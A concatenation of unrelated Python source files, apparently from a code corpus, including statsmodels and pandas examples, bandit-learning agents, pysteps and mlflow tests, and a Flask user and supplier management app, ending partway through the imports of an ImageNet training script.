# -------------------------------------------------
# implementation details
# -------------------------------------------------
class _FactoryHelper_( XSingleComponentFactory, XServiceInfo, Base ):
def __init__( self, clazz, implementationName, serviceNames ):
self.clazz = clazz
self.implementationName = implementationName
self.serviceNames = serviceNames
def getImplementationName( self ):
return self.implementationName
def supportsService( self, ServiceName ):
return ServiceName in self.serviceNames
def getSupportedServiceNames( self ):
return self.serviceNames
def createInstanceWithContext( self, context ):
return self.clazz( context )
def createInstanceWithArgumentsAndContext( self, args, context ):
return self.clazz( context, *args )
|
py | b41504aaa782cab69ad0cab9e5b4f0cec5c5ae2a | # -*- coding: utf-8 -*-
"""Out of sample prediction
"""
import numpy as np
import statsmodels.api as sm
#Create some data
nsample = 50
sig = 0.25
x1 = np.linspace(0, 20, nsample)
X = np.c_[x1, np.sin(x1), (x1 - 5)**2, np.ones(nsample)]
beta = [0.5, 0.5, -0.02, 5.]
y_true = np.dot(X, beta)
y = y_true + sig * np.random.normal(size=nsample)
#Setup and estimate the model
olsmod = sm.OLS(y, X)
olsres = olsmod.fit()
print(olsres.params)
print(olsres.bse)
#In-sample prediction
ypred = olsres.predict(X)
#Create a new sample of explanatory variables Xnew, predict and plot
x1n = np.linspace(20.5, 25, 10)
Xnew = np.c_[x1n, np.sin(x1n), (x1n - 5)**2, np.ones(10)]
ynewpred = olsres.predict(Xnew) # predict out of sample
print(ypred)
import matplotlib.pyplot as plt
plt.figure();
plt.plot(x1, y, 'o', x1, y_true, 'b-');
plt.plot(np.hstack((x1, x1n)), np.hstack((ypred, ynewpred)), 'r');
#@savefig ols_predict.png
plt.title('OLS prediction, blue: true and data, fitted/predicted values:red');
|
py | b41504da18b7b2de327f446da666bffb7d4a44f1 | import numpy as np
from scipy.stats import beta
from basics.base_agent import BaseAgent
class Agent(BaseAgent):
"""agent does *no* learning, selects random action always"""
def __init__(self):
super().__init__()
self.arm_count = None
self.last_action = None
self.num_actions = None
self.q_values = None
self.step_size = None
self.initial_value = 0.0
self.batch_size = None
self.q_values_oracle = None # used for batch updates
def agent_init(self, agent_info=None):
"""Setup for the agent called when the experiment first starts."""
if agent_info is None:
agent_info = {}
self.num_actions = agent_info.get("num_actions", 2)
self.initial_value = agent_info.get("initial_value", 0.0)
self.q_values = np.ones(agent_info.get("num_actions", 2)) * self.initial_value
self.step_size = agent_info.get("step_size", 0.1)
self.batch_size = agent_info.get('batch_size', 1)
self.q_values_oracle = self.q_values.copy()
self.arm_count = np.zeros(self.num_actions) # [0.0 for _ in range(self.num_actions)]
# self.last_action = np.random.choice(self.num_actions) # set first action to random
def agent_start(self, observation):
"""The first method called when the experiment starts, called after
the environment starts.
Args:
observation (Numpy array): the state observation from the
environment's evn_start function.
Returns:
The first action the agent takes.
"""
self.last_action = np.random.choice(self.num_actions)
return self.last_action
def agent_step(self, reward, observation):
"""A step taken by the agent.
Args:
reward (float): the reward received for taking the last action taken
observation (Numpy array): the state observation from the
environment's step based, where the agent ended up after the
last step
Returns:
The action the agent is taking.
"""
# local_action = 0 # choose the action here
self.last_action = np.random.choice(self.num_actions)
return self.last_action
def agent_end(self, reward):
pass
def agent_cleanup(self):
pass
def agent_message(self, message):
pass
def argmax(q_values):
"""
Takes in a list of q_values and returns the index of the item
with the highest value. Breaks ties randomly.
returns: int - the index of the highest value in q_values
"""
top_value = float("-inf")
ties = []
for i in range(len(q_values)):
if q_values[i] > top_value:
ties = [i]
top_value = q_values[i]
elif q_values[i] == top_value:
ties.append(i)
return np.random.choice(ties)
class GreedyAgent(Agent):
def __init__(self):
super().__init__()
def agent_init(self, agent_info=None):
if agent_info is None:
agent_info = {}
super().agent_init(agent_info)
def agent_step(self, reward, observation):
"""
Takes one step for the agent. It takes in a reward and observation and
returns the action the agent chooses at that time step.
Arguments:
reward -- float, the reward the agent received from the environment after taking the last action.
observation -- float, the observed state the agent is in. Do not worry about this as you will not use it
until future lessons
Returns:
current_action -- int, the action chosen by the agent at the current time step.
"""
a = self.last_action
self.arm_count[a] += 1
self.q_values_oracle[a] = self.q_values_oracle[a] + 1 / self.arm_count[a] * (reward - self.q_values_oracle[a])
if sum(self.arm_count) % self.batch_size == 0:
self.q_values = self.q_values_oracle.copy()
current_action = argmax(self.q_values)
self.last_action = current_action
return current_action
class EpsilonGreedyAgent(Agent):
def __init__(self):
super().__init__()
self.epsilon = None
def agent_init(self, agent_info=None):
if agent_info is None:
agent_info = {}
super().agent_init(agent_info)
self.epsilon = agent_info.get("epsilon", 0.1)
def agent_step(self, reward, observation):
"""
Takes one step for the agent. It takes in a reward and observation and
returns the action the agent chooses at that time step.
Arguments:
reward -- float, the reward the agent received from the environment after taking the last action.
observation -- float, the observed state the agent is in. Do not worry about this as you will not use it
until future lessons
Returns:
current_action -- int, the action chosen by the agent at the current time step.
"""
a = self.last_action
self.arm_count[a] += 1
self.q_values_oracle[a] = self.q_values_oracle[a] + 1 / self.arm_count[a] * (reward - self.q_values_oracle[a])
if np.sum(self.arm_count) % self.batch_size == 0:
self.q_values = self.q_values_oracle.copy()
if np.random.random() < self.epsilon:
current_action = np.random.choice(range(len(self.arm_count)))
else:
current_action = argmax(self.q_values)
self.last_action = current_action
return current_action
class UCBAgent(Agent):
def __init__(self):
super().__init__()
self.upper_bounds = None
self.alpha = None # exploration parameter
def agent_init(self, agent_info=None):
if agent_info is None:
agent_info = {}
super().agent_init(agent_info)
self.alpha = agent_info.get("alpha", 1.0)
self.arm_count = np.ones(self.num_actions)
self.upper_bounds = np.sqrt(np.log(np.sum(self.arm_count)) / self.arm_count)
def agent_step(self, reward, observation):
a = self.last_action
self.arm_count[a] += 1
self.q_values_oracle[a] = self.q_values_oracle[a] + 1 / self.arm_count[a] * (reward - self.q_values_oracle[a])
# since we start with arms_count = np.ones(num_actions),
# we should subtract num_actions to get number of the current round
if (np.sum(self.arm_count) - self.num_actions) % self.batch_size == 0:
self.q_values = self.q_values_oracle.copy()
self.upper_bounds = np.sqrt(np.log(np.sum(self.arm_count)) / self.arm_count)
# if min(self.q_values + self.alpha * self.upper_bounds) < max(self.q_values):
# print(f'Distinguish suboptimal arm at step {sum(self.arm_count)}')
current_action = argmax(self.q_values + self.alpha * self.upper_bounds)
# current_action = np.argmax(self.q_values + self.alpha * self.upper_bounds)
self.last_action = current_action
return current_action
class TSAgent(Agent):
def agent_step(self, reward, observation):
a = self.last_action
self.arm_count[a] += 1
self.q_values_oracle[a] = self.q_values_oracle[a] + 1 / self.arm_count[a] * (reward - self.q_values_oracle[a])
if (np.sum(self.arm_count) - self.num_actions) % self.batch_size == 0:
self.q_values = self.q_values_oracle.copy()
# sample from posteriors
theta = [beta.rvs(a + 1, b + 1, size=1) for a, b in
zip(self.q_values * self.arm_count, self.arm_count - self.q_values * self.arm_count)]
# choose the max realization
current_action = argmax(theta)
self.last_action = current_action
return current_action
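# Illustrative smoke test (added for clarity; not part of the original module):
# run the epsilon-greedy agent on a hand-rolled 2-armed Bernoulli bandit. The
# arm success probabilities, the 200-step horizon and epsilon=0.1 are arbitrary.
if __name__ == "__main__":
    true_probs = [0.3, 0.7]                       # success rate of each arm
    agent = EpsilonGreedyAgent()
    agent.agent_init({"num_actions": 2, "epsilon": 0.1})
    action = agent.agent_start(observation=None)
    for _ in range(200):
        reward = float(np.random.random() < true_probs[action])  # Bernoulli reward
        action = agent.agent_step(reward, observation=None)
    print("estimated q-values:", agent.q_values)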
|
py | b41505786aae7f1676229a0e50f7aa20725b09af | # -*- coding: utf-8 -*-
import datetime as dt
import numpy as np
import pytest
from numpy.testing import assert_array_equal, assert_array_almost_equal
from pytest import raises
from pysteps.utils import arrays, conversion, dimension, transformation, aggregate_fields
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# arrays
# compute_centred_coord_array
test_data = [
(2, 2, [np.array([[-1, 0]]).T, np.array([[-1, 0]])]),
(3, 3, [np.array([[-1, 0, 1]]).T, np.array([[-1, 0, 1]])]),
(3, 2, [np.array([[-1, 0, 1]]).T, np.array([[-1, 0]])]),
(2, 3, [np.array([[-1, 0]]).T, np.array([[-1, 0, 1]])]),
]
@pytest.mark.parametrize("M, N, expected", test_data)
def test_compute_centred_coord_array(M, N, expected):
"""Test the compute_centred_coord_array."""
assert_array_equal(arrays.compute_centred_coord_array(M, N)[0], expected[0])
assert_array_equal(arrays.compute_centred_coord_array(M, N)[1], expected[1])
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# conversion
# to_rainrate
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([1]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([12]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([1.25892541]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([15.10710494]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "dBZ",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.04210719]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "log",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([2.71828183]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "log",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([32.61938194]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([1]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([12.0]),
),
]
@pytest.mark.parametrize("R, metadata, expected", test_data)
def test_to_rainrate(R, metadata, expected):
"""Test the to_rainrate."""
assert_array_almost_equal(conversion.to_rainrate(R, metadata)[0], expected)
# to_raindepth
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.08333333]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([1]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.10491045]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([1.25892541]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "dBZ",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.00350893]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "log",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.22652349]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "log",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([2.71828183]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([0.08333333]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([1.0]),
),
]
@pytest.mark.parametrize("R, metadata, expected", test_data)
def test_to_raindepth(R, metadata, expected):
"""Test the to_raindepth."""
assert_array_almost_equal(conversion.to_raindepth(R, metadata)[0], expected)
# to_reflectivity
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([23.01029996]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([40.27719989]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([24.61029996]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([41.87719989]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "dBZ",
"threshold": 0,
"zerovalue": 0,
},
np.array([1]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "log",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([29.95901167]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "log",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([47.2259116]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
np.array([23.01029996]),
),
(
np.array([1.0]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm",
"threshold": 0,
"zerovalue": 0,
},
np.array([40.27719989]),
),
]
@pytest.mark.parametrize("R, metadata, expected", test_data)
def test_to_reflectivity(R, metadata, expected):
"""Test the to_reflectivity."""
assert_array_almost_equal(conversion.to_reflectivity(R, metadata)[0], expected)
test_data_not_trim = (
# "data, window_size, axis, method, expected"
(
np.arange(6),
2,
0,
"mean",
np.array([0.5, 2.5, 4.5])
),
(
np.arange(4 * 6).reshape(4, 6),
(2, 3),
(0, 1),
"sum",
np.array([[24, 42], [96, 114]])
),
(
np.arange(4 * 6).reshape(4, 6),
(2, 2),
(0, 1),
"sum",
np.array([[14, 22, 30], [62, 70, 78]])
),
(
np.arange(4 * 6).reshape(4, 6),
2,
(0, 1),
"sum",
np.array([[14, 22, 30], [62, 70, 78]])
),
(
np.arange(4 * 6).reshape(4, 6),
(2, 3),
(0, 1),
"mean",
np.array([[4., 7.], [16., 19.]]),
),
(
np.arange(4 * 6).reshape(4, 6),
(2, 2),
(0, 1),
"mean",
np.array([[3.5, 5.5, 7.5], [15.5, 17.5, 19.5]])
),
(
np.arange(4 * 6).reshape(4, 6),
2,
(0, 1),
"mean",
np.array([[3.5, 5.5, 7.5], [15.5, 17.5, 19.5]])
),
)
@pytest.mark.parametrize(
"data, window_size, axis, method, expected", test_data_not_trim
)
def test_aggregate_fields(data, window_size, axis, method, expected):
"""
Test the aggregate_fields function.
    The window size must divide the data dimensions exactly.
    Internally, additional tests are generated for situations where the
    window size does not divide the data dimensions.
The length of each dimension should be larger than 2.
"""
assert_array_equal(
aggregate_fields(data, window_size, axis=axis, method=method),
expected,
)
# Test the trimming capabilities.
data = np.pad(data, (0, 1))
assert_array_equal(
aggregate_fields(data,
window_size,
axis=axis,
method=method,
trim=True),
expected,
)
with raises(ValueError):
aggregate_fields(data,
window_size,
axis=axis,
method=method)
def test_aggregate_fields_errors():
"""
Test that the errors are correctly captured in the aggregate_fields
function.
"""
data = np.arange(4 * 6).reshape(4, 6)
with raises(ValueError):
aggregate_fields(data, -1, axis=0)
with raises(ValueError):
aggregate_fields(data, 0, axis=0)
with raises(ValueError):
aggregate_fields(data, 1, method="invalid")
with raises(TypeError):
aggregate_fields(data, (1, 1), axis=0)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# dimension
# aggregate_fields_time
timestamps = [dt.datetime.now() + dt.timedelta(minutes=t) for t in range(10)]
test_data = [
(
np.ones((10, 1, 1)),
{"unit": "mm/h", "timestamps": timestamps},
2,
False,
np.ones((5, 1, 1)),
),
(
np.ones((10, 1, 1)),
{"unit": "mm", "timestamps": timestamps},
2,
False,
2 * np.ones((5, 1, 1)),
),
]
@pytest.mark.parametrize(
"R, metadata, time_window_min, ignore_nan, expected", test_data
)
def test_aggregate_fields_time(R, metadata, time_window_min, ignore_nan, expected):
"""Test the aggregate_fields_time."""
assert_array_equal(
dimension.aggregate_fields_time(R, metadata, time_window_min, ignore_nan)[0],
expected,
)
# aggregate_fields_space
test_data = [
(
np.ones((1, 10, 10)),
{"unit": "mm/h", "xpixelsize": 1, "ypixelsize": 1},
2,
False,
np.ones((1, 5, 5)),
),
(
np.ones((1, 10, 10)),
{"unit": "mm", "xpixelsize": 1, "ypixelsize": 1},
2,
False,
4 * np.ones((1, 5, 5)),
),
]
@pytest.mark.parametrize("R, metadata, space_window, ignore_nan, expected", test_data)
def test_aggregate_fields_space(R, metadata, space_window, ignore_nan, expected):
"""Test the aggregate_fields_space."""
assert_array_equal(
dimension.aggregate_fields_space(R, metadata, space_window, ignore_nan)[0],
expected,
)
# clip_domain
R = np.zeros((4, 4))
R[:2, :] = 1
test_data = [
(
R,
{
"x1": 0,
"x2": 4,
"y1": 0,
"y2": 4,
"xpixelsize": 1,
"ypixelsize": 1,
"zerovalue": 0,
"yorigin": "upper",
},
None,
R,
),
(
R,
{
"x1": 0,
"x2": 4,
"y1": 0,
"y2": 4,
"xpixelsize": 1,
"ypixelsize": 1,
"zerovalue": 0,
"yorigin": "lower",
},
(2, 4, 2, 4),
np.zeros((2, 2)),
),
(
R,
{
"x1": 0,
"x2": 4,
"y1": 0,
"y2": 4,
"xpixelsize": 1,
"ypixelsize": 1,
"zerovalue": 0,
"yorigin": "upper",
},
(2, 4, 2, 4),
np.ones((2, 2)),
),
]
@pytest.mark.parametrize("R, metadata, extent, expected", test_data)
def test_clip_domain(R, metadata, extent, expected):
"""Test the clip_domain."""
assert_array_equal(dimension.clip_domain(R, metadata, extent)[0], expected)
# square_domain
R = np.zeros((4, 2))
test_data = [
# square by padding
(
R,
{"x1": 0, "x2": 2, "y1": 0, "y2": 4, "xpixelsize": 1, "ypixelsize": 1},
"pad",
False,
np.zeros((4, 4)),
),
# square by cropping
(
R,
{"x1": 0, "x2": 2, "y1": 0, "y2": 4, "xpixelsize": 1, "ypixelsize": 1},
"crop",
False,
np.zeros((2, 2)),
),
# inverse square by padding
(
np.zeros((4, 4)),
{
"x1": -1,
"x2": 3,
"y1": 0,
"y2": 4,
"xpixelsize": 1,
"ypixelsize": 1,
"orig_domain": (4, 2),
"square_method": "pad",
},
"pad",
True,
R,
),
# inverse square by cropping
(
np.zeros((2, 2)),
{
"x1": 0,
"x2": 2,
"y1": 1,
"y2": 3,
"xpixelsize": 1,
"ypixelsize": 1,
"orig_domain": (4, 2),
"square_method": "crop",
},
"crop",
True,
R,
),
]
@pytest.mark.parametrize("R, metadata, method, inverse, expected", test_data)
def test_square_domain(R, metadata, method, inverse, expected):
"""Test the square_domain."""
assert_array_equal(
dimension.square_domain(R, metadata, method, inverse)[0], expected
)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# transformation
# boxcox_transform
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
None,
None,
None,
False,
np.array([0]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "BoxCox",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
None,
None,
None,
True,
np.array([np.exp(1)]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
1.0,
None,
None,
False,
np.array([0]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "BoxCox",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
1.0,
None,
None,
True,
np.array([2.0]),
),
]
@pytest.mark.parametrize(
"R, metadata, Lambda, threshold, zerovalue, inverse, expected", test_data
)
def test_boxcox_transform(R, metadata, Lambda, threshold, zerovalue, inverse, expected):
"""Test the boxcox_transform."""
assert_array_almost_equal(
transformation.boxcox_transform(
R, metadata, Lambda, threshold, zerovalue, inverse
)[0],
expected,
)
# dB_transform
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
None,
None,
False,
np.array([0]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "dB",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
None,
None,
True,
np.array([1.25892541]),
),
]
@pytest.mark.parametrize(
"R, metadata, threshold, zerovalue, inverse, expected", test_data
)
def test_dB_transform(R, metadata, threshold, zerovalue, inverse, expected):
"""Test the dB_transform."""
assert_array_almost_equal(
transformation.dB_transform(R, metadata, threshold, zerovalue, inverse)[0],
expected,
)
# NQ_transform
test_data = [
(
np.array([1, 2]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
False,
np.array([-0.4307273, 0.4307273]),
)
]
@pytest.mark.parametrize("R, metadata, inverse, expected", test_data)
def test_NQ_transform(R, metadata, inverse, expected):
"""Test the NQ_transform."""
assert_array_almost_equal(
transformation.NQ_transform(R, metadata, inverse)[0], expected
)
# sqrt_transform
test_data = [
(
np.array([1]),
{
"accutime": 5,
"transform": None,
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
False,
np.array([1]),
),
(
np.array([1]),
{
"accutime": 5,
"transform": "sqrt",
"unit": "mm/h",
"threshold": 0,
"zerovalue": 0,
},
True,
np.array([1]),
),
]
@pytest.mark.parametrize("R, metadata, inverse, expected", test_data)
def test_sqrt_transform(R, metadata, inverse, expected):
"""Test the sqrt_transform."""
assert_array_almost_equal(
transformation.sqrt_transform(R, metadata, inverse)[0], expected
)
|
py | b41506c3894ab4982c8048a88e30451b577bae2a | """ Endpoint Callback Handlers """
import logging as log
import uuid
import json
from . import model
def greeter(name):
"""Greeter route callback"""
return f"Hello {name}!"
# def save_user(user, user_id=""):
# """Save User route callback"""
# if user_id == "":
# user_id = str(uuid.uuid4())
# log.info("Saving USER_ID: %s", user_id)
# user = json.dumps(user)
# return model.save_user(user, user_id)
def reserve(json_body):
"""Save reservation callback"""
return model.save_reservation(json_body)
def get_reservations(flight_id):
"""Get reservations callback"""
return model.get_reservations(flight_id)
|
py | b41506d24e2e306036dd0f162931e30ce50791bc | import os
import inspect
from unittest import mock
import pytest
import mlflow
from mlflow.utils.file_utils import path_to_local_sqlite_uri
from tests.autologging.fixtures import test_mode_on
@pytest.fixture
def reset_mock():
cache = []
def set_mock(obj, attr, mock):
cache.append((obj, attr, getattr(obj, attr)))
setattr(obj, attr, mock)
yield set_mock
for obj, attr, value in cache:
setattr(obj, attr, value)
cache[:] = []
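# Illustrative use of the reset_mock fixture (hypothetical test; the patched attribute
# name below is made up). The set_mock callback swaps in a replacement attribute and
# the fixture restores the original value after the test finishes:
#
#   def test_example(reset_mock):
#       reset_mock(mlflow.tracking, "some_attr", mock.Mock())
#       ...  # original attribute is restored automatically on teardown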
@pytest.fixture(autouse=True)
def tracking_uri_mock(tmpdir, request):
try:
if "notrackingurimock" not in request.keywords:
tracking_uri = path_to_local_sqlite_uri(os.path.join(tmpdir.strpath, "mlruns"))
mlflow.set_tracking_uri(tracking_uri)
os.environ["MLFLOW_TRACKING_URI"] = tracking_uri
yield tmpdir
finally:
mlflow.set_tracking_uri(None)
if "notrackingurimock" not in request.keywords:
del os.environ["MLFLOW_TRACKING_URI"]
@pytest.fixture(autouse=True, scope="session")
def enable_test_mode_by_default_for_autologging_integrations():
"""
Run all MLflow tests in autologging test mode, ensuring that errors in autologging patch code
are raised and detected. For more information about autologging test mode, see the docstring
for :py:func:`mlflow.utils.autologging_utils._is_testing()`.
"""
yield from test_mode_on()
@pytest.fixture(autouse=True)
def clean_up_leaked_runs():
"""
Certain test cases validate safety API behavior when runs are leaked. Leaked runs that
are not cleaned up between test cases may result in cascading failures that are hard to
debug. Accordingly, this fixture attempts to end any active runs it encounters and
    throws an exception (which is reported as an additional error in the pytest execution output).
"""
try:
yield
assert (
not mlflow.active_run()
), "test case unexpectedly leaked a run. Run info: {}. Run data: {}".format(
mlflow.active_run().info, mlflow.active_run().data
)
finally:
while mlflow.active_run():
mlflow.end_run()
def _called_in_save_model():
for frame in inspect.stack()[::-1]:
if frame.function == "save_model":
return True
return False
@pytest.fixture(autouse=True)
def prevent_infer_pip_requirements_fallback(request):
"""
Prevents `mlflow.models.infer_pip_requirements` from falling back in `mlflow.*.save_model`
unless explicitly disabled via `pytest.mark.disable_prevent_infer_pip_requirements_fallback`.
"""
from mlflow.utils.environment import _INFER_PIP_REQUIREMENTS_FALLBACK_MESSAGE
def new_exception(msg, *_, **__):
if msg == _INFER_PIP_REQUIREMENTS_FALLBACK_MESSAGE and _called_in_save_model():
raise Exception(
"`mlflow.models.infer_pip_requirements` should not fall back in"
"`mlflow.*.save_model` during test"
)
if "disable_prevent_infer_pip_requirements_fallback" not in request.keywords:
with mock.patch("mlflow.utils.environment._logger.exception", new=new_exception):
yield
else:
yield
|
py | b41506eae9852aa856410c351ce99db45d2417f9 | import pandas
yillar = [2015, 2016, 2017, 2018]
gelirler = [500, 600, 700, 800]
x = pandas.Series(data=gelirler, index=yillar)
print(x)
print(x.sum())
print(x.max())
print(x.mean())
print(x.median())
print(x.var())
print(x.std())
print(x.describe())
|
py | b4150716a0e379162383f75043233aa5f2cd27a9 | # IMPORTS
from flask import render_template, url_for, flash, redirect, request
from flask_login import login_user, logout_user, current_user, login_required
from project import app, db, bcrypt
from project.forms import loginForm, createUserForm, editUserForm, createSupplierForm, editSupplierForm
from project.models import users, suppliers
from project.tables import userList, supplierList
# MAIN ROUTES
@app.route("/home")
@login_required
def home():
return render_template('home.html', title='Home')
@app.route("/", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = loginForm()
if form.validate_on_submit():
user = users.query.filter_by(id=form.userID.data).first()
if user and bcrypt.check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('home'))
else:
flash('Incorrect Details')
return render_template('login.html', title='Login', form=form)
@app.route("/logout")
@login_required
def logout():
logout_user()
return redirect(url_for('login'))
# USER ROUTES
@app.route("/displayUsers")
@login_required
def displayUsers():
table = userList(users.query.all())
return render_template('user/displayUsers.html', title='Users', table=table)
@app.route("/displayUsers/createUser", methods=['GET', 'POST'])
@login_required
def createUser():
form = createUserForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = users(
name = form.name.data,
address = form.address.data,
email = form.email.data,
phone = form.phone.data,
area = form.area.data,
password = hashed_password,
access = form.access.data
)
db.session.add(user)
db.session.commit()
flash(f'- Created User ({user.name})')
return redirect(url_for('displayUsers'))
return render_template('user/createUser.html', title='Create User', form=form)
@app.route('/displayUsers/editUser/<int:id>', methods=['GET', 'POST'])
@login_required
def editUser(id):
form = editUserForm()
find = db.session.query(users).filter(users.id==id)
user = find.first()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user.name = form.name.data
user.address = form.address.data
user.email = form.email.data
user.phone = form.phone.data
user.area = form.area.data
user.password = hashed_password
user.access = form.access.data
db.session.commit()
flash(f'- Updated User ({user.name})')
return redirect(url_for('displayUsers'))
elif request.method == 'GET':
form.name.data = user.name
form.address.data = user.address
form.email.data = user.email
form.phone.data = user.phone
form.area.data = user.area
form.access.data = user.access
return render_template('user/editUser.html', title='Edit User',form=form)
@app.route('/displayUsers/removeUser/<int:id>', methods=['GET', 'POST'])
@login_required
def removeUser(id):
find = db.session.query(users).filter(users.id==id)
user = find.first()
if user and user != current_user:
flash(f'- Removed User ({user.name})')
db.session.delete(user)
db.session.commit()
return redirect(url_for('displayUsers'))
# SUPPLIER ROUTES
@app.route("/displaySuppliers")
@login_required
def displaySuppliers():
table = supplierList(suppliers.query.all())
return render_template('supplier/displaySuppliers.html', title='Suppliers', table=table)
@app.route("/displaySuppliers/createSupplier", methods=['GET', 'POST'])
@login_required
def createSupplier():
form = createSupplierForm()
if form.validate_on_submit():
supplier = suppliers(
name = form.name.data,
address = form.address.data,
email1 = form.email1.data,
email2 = form.email2.data,
email3 = form.email3.data,
phone = form.phone.data,
type = form.type.data
)
db.session.add(supplier)
db.session.commit()
flash(f'- Created Supplier ({supplier.name})')
return redirect(url_for('displaySuppliers'))
return render_template('supplier/createSupplier.html', title='Create Supplier', form=form)
@app.route('/displaySuppliers/editSupplier/<int:id>', methods=['GET', 'POST'])
@login_required
def editSupplier(id):
form = editSupplierForm()
find = db.session.query(suppliers).filter(suppliers.id==id)
supplier = find.first()
if form.validate_on_submit():
supplier.name = form.name.data
supplier.address = form.address.data
supplier.email1 = form.email1.data
supplier.email2 = form.email2.data
supplier.email3 = form.email3.data
supplier.phone = form.phone.data
supplier.type = form.type.data
db.session.commit()
flash(f'- Updated Supplier ({supplier.name})')
return redirect(url_for('displaySuppliers'))
elif request.method == 'GET':
form.name.data = supplier.name
form.address.data = supplier.address
form.email1.data = supplier.email1
form.email2.data = supplier.email2
form.email3.data = supplier.email3
form.phone.data = supplier.phone
form.type.data = supplier.type
return render_template('supplier/editSupplier.html', title='Edit Supplier',form=form)
@app.route('/displaySuppliers/removeSupplier/<int:id>', methods=['GET', 'POST'])
@login_required
def removeSupplier(id):
find = db.session.query(suppliers).filter(suppliers.id==id)
supplier = find.first()
if supplier:
flash(f'- Removed Supplier ({supplier.name})')
db.session.delete(supplier)
db.session.commit()
return redirect(url_for('displaySuppliers'))
|
py | b415074a4f80d7f57b088cbea441c364137bf992 | '''
Training script for ImageNet
Copyright (c) Wei YANG, 2017
'''
from __future__ import print_function
import argparse
import os
import random
import shutil
import time
import warnings
import torch
from torch.fx.graph_module import GraphModule
import torch.nn as nn
from torch.nn.modules import module
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
from torch.serialization import save
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import models.imagenet as customized_models
